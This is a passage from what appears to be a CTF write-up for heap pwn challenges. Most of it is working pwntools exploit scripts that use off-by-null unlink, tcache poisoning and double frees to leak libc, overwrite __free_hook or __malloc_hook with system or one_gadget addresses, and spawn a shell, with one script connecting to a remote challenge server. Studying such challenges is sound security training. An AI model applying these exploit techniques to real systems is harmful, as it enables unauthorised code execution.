add(4, 0x60, b"aaa" + p64(0)*2 + p64(libc.address + 0xf03a4) + p64(0))
# Freeing index 0 twice in a row is rejected as a double free; on libc 2.23 the error report
# allocates memory, which goes through the overwritten __malloc_hook (heading: "double_free报错拿shell").
free(0)
free(0)
# free(2)

p.interactive()

# 0x45226 execve("/bin/sh", rsp+0x30, environ)
# constraints:
#   rax == NULL

# 0x4527a execve("/bin/sh", rsp+0x30, environ)
# constraints:
#   [rsp+0x30] == NULL

# 0xf03a4 execve("/bin/sh", rsp+0x50, environ)
# constraints:
#   [rsp+0x50] == NULL

# 0xf1247 execve("/bin/sh", rsp+0x70, environ)
# constraints:
#   [rsp+0x70] == NULL

sized_note

off by null, unlink unsorted bins

from pwn import *

context(os='linux', arch='amd64', log_level='debug')

# NOTE(review): the local process is started and then immediately shadowed by the remote
# connection, so it lingers unused until the script exits; comment one of the two out.
p = process("./note")
p = remote("chuj.top", 52966)
# The 7-entry tcache count and the 96-byte arena distance used below assume a tcache-era libc
# (the file is the one shipped with the challenge; its version is not shown here).
libc = ELF("./libc.so.6")


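def proof(y):
    """Solve the server's proof-of-work: find the 4-character alphanumeric string whose
    SHA-256 hex digest equals *y*, send it to ``p`` as a line, and return it.

    Candidates are enumerated over ascii letters followed by digits, leftmost position
    slowest — the same order as the original four nested loops, so the first match (and
    hence what gets sent) is unchanged. Imports are explicit instead of relying on
    ``from pwn import *`` re-exporting ``string`` and ``hashlib``.

    Args:
        y: lowercase hex SHA-256 digest (str) copied from the challenge banner.

    Returns:
        The matching string, or None when no 4-character candidate hashes to *y*.
        In that case 'Wrong!' is printed, as before, and nothing is sent; callers on
        this page do not check the result, so their next recv would then stall.
    """
    import hashlib
    import itertools
    import string

    alphabet = string.ascii_letters + string.digits
    # Worst case 62**4 (~15M) hashes — acceptable for a one-off handshake.
    for combo in itertools.product(alphabet, repeat=4):
        candidate = "".join(combo)
        if hashlib.sha256(candidate.encode()).hexdigest() == y:
            p.sendline(candidate)
            return candidate
    print('Wrong!')
    return None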


# Proof-of-work handshake: the banner ends with " == <sha256 hex>"; proof() finds and sends the 4-char preimage.
p.recvuntil(b" == ")
a = p.recvuntil(b"\n")[:-1].decode()
print(a)
proof(a)

def menu(i):
    """Choose menu option *i*: wait for the "5. farewell" line of the menu, then send the choice as a line."""
    choice = str(i)
    p.sendlineafter(b"5. farewell", choice)

def add(idx, size, content):
    """Menu option 1 (new note): answer the index and size prompts, then send *content* raw (no newline)."""
    menu(1)
    for prompt, answer in ((b"index?", idx), (b"size?", size)):
        p.sendlineafter(prompt, str(answer))
    p.sendafter(b"content?", content)

def edit(idx, content):
    """Menu option 4 (edit a note): answer the index prompt, then send *content* raw (no newline)."""
    target = str(idx)
    menu(4)
    p.sendlineafter(b"index?\n>> ", target)
    p.send(content)

def free(idx):
    """Menu option 3 (delete a note): answer the index prompt with *idx*."""
    target = str(idx)
    menu(3)
    p.sendlineafter(b"index?", target)

def show(idx):
    """Menu option 2 (print a note): answer the index prompt with *idx*."""
    target = str(idx)
    menu(2)
    p.sendlineafter(b"index?", target)





# Four notes alternating 0xf8 / 0x88 so chunks 0..3 sit next to each other, then seven more 0xf8
# notes whose frees fill the 7-entry tcache bin for that size.
add(0, 0xf8, b"aaa")
add(1, 0x88, b"aaa")
add(2, 0xf8, b"aaa")
add(3, 0x88, b"aaa")

for i in range(7):
    add(4+i, 0xf8, b"aaa")

for i in range(7):
    free(10 - i)

# Free 1, then 0: with the 0xf8 tcache bin full, chunk 0 goes to the unsorted bin.
free(1)
free(0)

# Off-by-null (heading): 0x80 bytes of filler plus an 8-byte prev_size fill the 0x88 content
# exactly, so the terminating NUL lands on chunk 2's size byte and clears its prev_inuse bit;
# prev_size = 0x190 covers chunk 0 + chunk 1. free(2) then consolidates backwards over note 1.
add(1, 0x88, b"a"*0x80+p64(0x90+0x100))
free(2)

# Drain the tcache (content "/bin/sh\x00" is a str here; bytes would be consistent with the rest),
# split a 0xf8 note off the merged free chunk, then show note 1, which now overlaps that chunk's
# arena pointers: 96 + 0x10 is the author's distance back to __malloc_hook.
for i in range(7):
    add(4+i, 0xf8,"/bin/sh\x00")
add(0, 0xf8,"cccc")
show(1)
libc.address = u64(p.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00")) - 96 - 0x10 - libc.sym['__malloc_hook']
print(hex(libc.address))
# gdb.attach(p, "b *$rebase(0x144B)")
# Put note 1's chunk on the 0x88 free list, then rewrite its link (still reachable through the
# overlapping note 1) to __free_hook. [:-1] sends only 7 bytes — presumably edit() NUL-terminates,
# so the top byte is supplied by the program; TODO confirm.
add(2, 0x88,"cccc")
free(2)
edit(1, p64(libc.sym["__free_hook"])[:-1])
# The second 0x88 allocation returns the hook itself and stores system's address there; freeing
# one of the "/bin/sh" notes then goes through the hook.
add(13, 0x88, p64(libc.sym["__free_hook"]))

add(14, 0x88, p64(libc.sym["system"]))
free(5)



p.interactive()

# 0x4f3d5 execve("/bin/sh", rsp+0x40, environ)
# constraints:
#   rsp & 0xf == 0
#   rcx == NULL

# 0x4f432 execve("/bin/sh", rsp+0x40, environ)
# constraints:
#   [rsp+0x40] == NULL

# 0x10a41c execve("/bin/sh", rsp+0x70, environ)
# constraints:
#   [rsp+0x70] == NULL

week4

vector

  • 了解vector的申请原理,制造double_free
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

# Local run only; the remote line is commented out (and its port is the one oldfashion_note uses,
# so it may be a leftover from that script). The PoW handshake below is commented out as well.
p = process("./vector")
# p = remote("chuj.top", 51445)
# The -0x170 arena distance used below is specific to this libc build.
libc = ELF("./libc.so.6")

# def proof(y):
#     may = string.ascii_letters+string.digits
#     for i in may:
#         for j in may:
#             for k in may:
#                 for l in may:
#                     res = i +j +k +l
#                     if hashlib.sha256((res).encode()).hexdigest() == y:
#                         p.sendline(res)
#                         return
#     print('Wrong!')


# p.recvuntil(b" == ")
# a = p.recvuntil(b"\n")[:-1].decode()
# print(a)
# proof(a)

def menu(i):
    """Choose menu option *i*: wait for the prompt containing "farewell", then send the choice as a line."""
    choice = str(i)
    p.sendlineafter(b"farewell", choice)

def add(idx, size, content):
    """Menu option 1 (new note): answer the index and size prompts, then send *content* raw (no newline)."""
    menu(1)
    for prompt, answer in ((b"index?", idx), (b"size?", size)):
        p.sendlineafter(prompt, str(answer))
    p.sendafter(b"content?", content)

def show(idx):
    """Menu option 3 (print a note): answer the index prompt with *idx*."""
    target = str(idx)
    menu(3)
    p.sendlineafter(b"index?", target)

def free(idx):
    """Menu option 4 (delete a note): answer the index prompt with *idx*."""
    target = str(idx)
    menu(4)
    p.sendlineafter(b"index?", target)

def move(f, t):
    """Menu option 5: answer the "[1/0]" prompt with 0 *f* times and then with 1, then send *t* at the next ">>" prompt.

    Which element is moved is decided by how many 0 answers precede the 1 (the program's
    semantics are not visible here).
    """
    prompt = "[1/0]\n>> "
    answers = [b"0"] * f + [b"1"]
    for reply in answers:
        p.sendlineafter(prompt, reply)
    p.sendlineafter(">>", str(t))



# Eight 0x100 notes then two 0x70 ones; freeing 1..7 fills the 7-entry tcache bin for 0x100 and
# freeing 0 sends it to the unsorted bin.
for i in range(8):
    add(i, 0x100, b"aaaa")

for i in range(8,10):
    add(i, 0x70, b"aaaa")

for i in range(1,8):
    free(i)

free(0)
# A 0x50 request is split off that unsorted chunk; show(0) prints past the 8 bytes of content up
# to a libc pointer. __malloc_hook + 0x170 is the author's distance for this libc.
add(0, 0x50, b'aaaaaaaa')
show(0)
libc.address = u64(p.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00")) - libc.sym["__malloc_hook"] - 0x170
print(hex(libc.address))

for i in range(1, 8):
    add(i, 0x70, b'aaa')

# The heading says the vector's growth/reallocation is what produces a double free: after
# move(2, 17), indexes 2, 10 and 17 are freed in turn (which of them share a backing chunk is
# not visible in this listing).
move(2, 17)
add(10, 0x70, b'idx:10')
for i in range(3, 10):
    free(i)

free(2)
free(10)
free(17)
# Drain the seven tcache entries, then overwrite the doubly-freed chunk's free-list link with
# __free_hook; two allocations later the hook is returned and system's address stored there, and
# freeing the "/bin/sh" note goes through it.
for i in range(2, 9):
    add(i, 0x70, '\n')
add(9, 0x70, p64(libc.sym["__free_hook"]))
add(11, 0x70, b'pass\n')
add(12, 0x70, b'/bin/sh\x00\n')
add(17, 0x70, p64(libc.sym["system"]))
free(12)

# NOTE(review): leftover debugging hook — gdb.attach() here blocks the script until a debugger
# window is up (and fails when no terminal is available); remove it for unattended runs.
gdb.attach(p)
p.interactive()